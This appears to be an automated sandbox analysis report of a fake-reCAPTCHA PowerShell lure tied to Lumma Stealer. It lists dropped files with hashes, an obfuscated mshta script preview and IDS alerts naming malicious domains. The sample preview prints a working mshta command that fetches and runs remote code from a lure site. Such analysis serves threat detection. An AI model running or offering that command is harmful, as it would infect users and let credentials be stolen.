                                                                                                                                                                                              x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              No context
                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                              Entropy (8bit):0.8306887952169721
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugd:gJjJGtpTq2yv1AuNZRY3diu8iBVqFX
                                                                                                                                                                                              MD5:CDF2CA140BC0882ED73C804B176CEBFC
                                                                                                                                                                                              SHA1:468D2720A67E10FD0046A696C5E86E699FF69DF4
                                                                                                                                                                                              SHA-256:4F5243E19AFB906EDA7C70C080ECE79C4F105E0E37EDEF48F25A4AB97BED1774
                                                                                                                                                                                              SHA-512:B5FD2EF53D2C5CCDF00553F35B508B68B15E036FD9C46A1E2E1EF46953E38006FC2AFDBF9E040620332C93EB1B0281238E152281A33934909D509D3AA7CC101D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5b5ab145, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                              Entropy (8bit):0.6585863003800341
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                              MD5:CFAFA5B27B664B676DE1A53C2EB2D895
                                                                                                                                                                                              SHA1:49C042F49F2FA4447C47EAED41371F452726A8B1
                                                                                                                                                                                              SHA-256:954C9CA813077C8732C3884EC49217512DBDE773C8FB84B7B85F12B961A34440
                                                                                                                                                                                              SHA-512:625DDF14DF9B2D88FD59482AB837B913E18AE3EFC4D31AAE8D072E1BE309D75545E9B6ADEC2D1C99588907015A53D27F3727EF859226E6E3D2D95A61E0FA2AAC
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:[Z.E... ...............X\...;...{......................0.z..........{.......}W.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................MVm......}.....................'.....}...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                              Entropy (8bit):0.08109863688599644
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Atl6YeUNqk9jwurbGuAJkhvekl1l2QjllltollrekGltll/SPj:AqzmqkBwGrxlG2tGJe3l
                                                                                                                                                                                              MD5:6B5E78FEE02989BCCB8B7A0E178947B7
                                                                                                                                                                                              SHA1:3AFADEEE7DC66CF490A3266FE4A76EE8180C8FE3
                                                                                                                                                                                              SHA-256:AC5C23B122947463AD266D052E65C27B284ED01FD66658E142C7394B71C8A247
                                                                                                                                                                                              SHA-512:8A6A211FD6F0BC967E21150DC21C35A477239783AF8FF762CCFF8AC3E5EB83F8A731AC83B95EBFEC6624C7CF8E6431313242FF97BC16CA99FF5818391368B1A6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:8.......................................;...{.......}.......{...............{.......{...XL......{.....................'.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                              Entropy (8bit):3.2478978672539016
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:kKS9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:FDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                              MD5:AC0F9C5FC7A1281ED9960736941CD647
                                                                                                                                                                                              SHA1:F813C765E68593297EECDF99F9C1225C045D3667
                                                                                                                                                                                              SHA-256:61269CEF64A2EB99F0DE33041FDA852B62A46395123D52A40F233191F958CCC0
                                                                                                                                                                                              SHA-512:A76D3B4265BB5A1C15E660B8A855A388C7E8E9D9374CD756A99ADAA93412B9E727847705836358AFDCE14E573913EFD369F1C0AA10EAD1AE4E171BB8940D3E58
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:p...... ...........(-g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                              Entropy (8bit):4.0050635535766075
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):31911
                                                                                                                                                                                              Entropy (8bit):6.7549335931824395
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:Sbspoo/iiX2xPYqDKPbrDPeyacIk6hhVfb:S43/iiXpqDKCVnhhBb
                                                                                                                                                                                              MD5:D91B5DE3C5C867DB8A2EC4569AE55D5C
                                                                                                                                                                                              SHA1:B9CCDC1E0E8F124183A96AC6FD9025B698D08865
                                                                                                                                                                                              SHA-256:F55BA11EEB1D1D2784304DC96361A81701318F0864497950A28CABD1F8B51108
                                                                                                                                                                                              SHA-512:791FB337257F84C26A8D5424A5886183A477517889921C3309A8231063A2B67575B7D8A27DF2009107D8A149EAF5B67A427C41C5856EA8FE192740B70B05A58B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>var _0x2455=["\x64\x6F\x63\x75\x6D\x65\x6E\x74\x4D\x6F\x64\x65","\x61\x6C\x6C"];l1l= document[_0x2455[0]]|| document[_0x2455[1]];var c6efa=true;ll1=document.layers;lll=window.sidebar;c6efa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6efa|=lII;zLP=location.protocol+'0FD';x3UIcOiX8Zj='e7WgO75waI76';</script><script>xwq474P=new Array();xwq474P[0]='%63%38A%32oS\111b%35\166\155%36';c7hMs5q=new Array();c7hMs5q[0]='.\r.\n.<.h.t.m.l. .x~..n.s.=."~..t.p.:././.w~....w.3...o.r.g./.1.9~../.x~.~..".>~zd~..e.a.d.>.<
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6222
                                                                                                                                                                                              Entropy (8bit):3.7085525868578464
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:hixFihCgZbU2K+yYukvhkvklCywWn2fqQJXlziSogZo1/qQJXl/iSogZox1:8whCPoikvhkvCCtxfJXxHefJXlHi
                                                                                                                                                                                              MD5:8C02D0D813317F0E5E2D6CA3F827CB4C
                                                                                                                                                                                              SHA1:B6288BE32767C807F91D8CC9A8F41D10FF249B81
                                                                                                                                                                                              SHA-256:340CC4E4A33584080F9507E4990F3253DF5A0C8B328DB1818CFEA0FD649DC10F
                                                                                                                                                                                              SHA-512:C5583AA19FBFAC5D406782F356FAB1684D22119FB6B1DF124F63D60F4BAA9887EC6B3835DD22AF54750A1AFAB82A9F8ECEB22E5007F31008FEB12C94F79B9C63
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:...................................FL..................F.".. ...d........U.-g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......".-g..>._.-g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.I....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.I..Roaming.@......DWSl/Z.I....C......................B..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.I....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/Z.I....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.I....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.I....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z!I....q...........
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6222
                                                                                                                                                                                              Entropy (8bit):3.7085525868578464
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:hixFihCgZbU2K+yYukvhkvklCywWn2fqQJXlziSogZo1/qQJXl/iSogZox1:8whCPoikvhkvCCtxfJXxHefJXlHi
                                                                                                                                                                                              MD5:8C02D0D813317F0E5E2D6CA3F827CB4C
                                                                                                                                                                                              SHA1:B6288BE32767C807F91D8CC9A8F41D10FF249B81
                                                                                                                                                                                              SHA-256:340CC4E4A33584080F9507E4990F3253DF5A0C8B328DB1818CFEA0FD649DC10F
                                                                                                                                                                                              SHA-512:C5583AA19FBFAC5D406782F356FAB1684D22119FB6B1DF124F63D60F4BAA9887EC6B3835DD22AF54750A1AFAB82A9F8ECEB22E5007F31008FEB12C94F79B9C63
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:...................................FL..................F.".. ...d........U.-g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......".-g..>._.-g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z.I....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.I..Roaming.@......DWSl/Z.I....C......................B..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Z.I....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/Z.I....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Z.I....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Z.I....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z!I....q...........
                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                              File type:Unicode text, UTF-8 text, with no line terminators
                                                                                                                                                                                              Entropy (8bit):4.842251469033845
                                                                                                                                                                                              TrID:
                                                                                                                                                                                                File name:00.ps1
                                                                                                                                                                                                File size:113 bytes
                                                                                                                                                                                                MD5:8067bbe2706cbd02f6885c17c186e6cd
                                                                                                                                                                                                SHA1:2d8e307684b8b5f8a8a68d5892db6879eaa69b25
                                                                                                                                                                                                SHA256:44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
                                                                                                                                                                                                SHA512:e524709437749c9a6f6d35b256712f56fa90892dbc26bacaebb85985341cefeb55539661be2fa4a6a25683128962b7b0b19b6a740fe9631ee12d8cc7f09951c5
                                                                                                                                                                                                SSDEEP:3:rN6eX7XsFMXWIWjDXbgG+RbqRF4I1yMQRWLBCn:Z6eXQaPq3gTIMPyBCn
                                                                                                                                                                                                TLSH:50B022B20C0020222F23002C02002B88033C8288A0F00023222200300033CB0C323008
                                                                                                                                                                                                File Content Preview:mshta https://view-reserve.com/recaptcha-verify.html # ... ''I am not a robot - reCAPTCHA Verification ID: 7848''
                                                                                                                                                                                                Icon Hash:3270d6baae77db44
                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2025-01-15T10:09:11.832910+01002059221ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat)1192.168.2.5503831.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.848853+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.2.5578531.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.867321+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.2.5567341.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.887607+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.2.5647551.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.898821+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.2.5579741.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.913322+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.2.5631011.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.932328+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.2.5587201.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.948087+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.2.5645291.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:11.980268+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.2.5580901.1.1.153UDP
                                                                                                                                                                                                2025-01-15T10:09:12.652233+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711104.102.49.254443TCP
                                                                                                                                                                                                2025-01-15T10:09:13.234585+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549711104.102.49.254443TCP
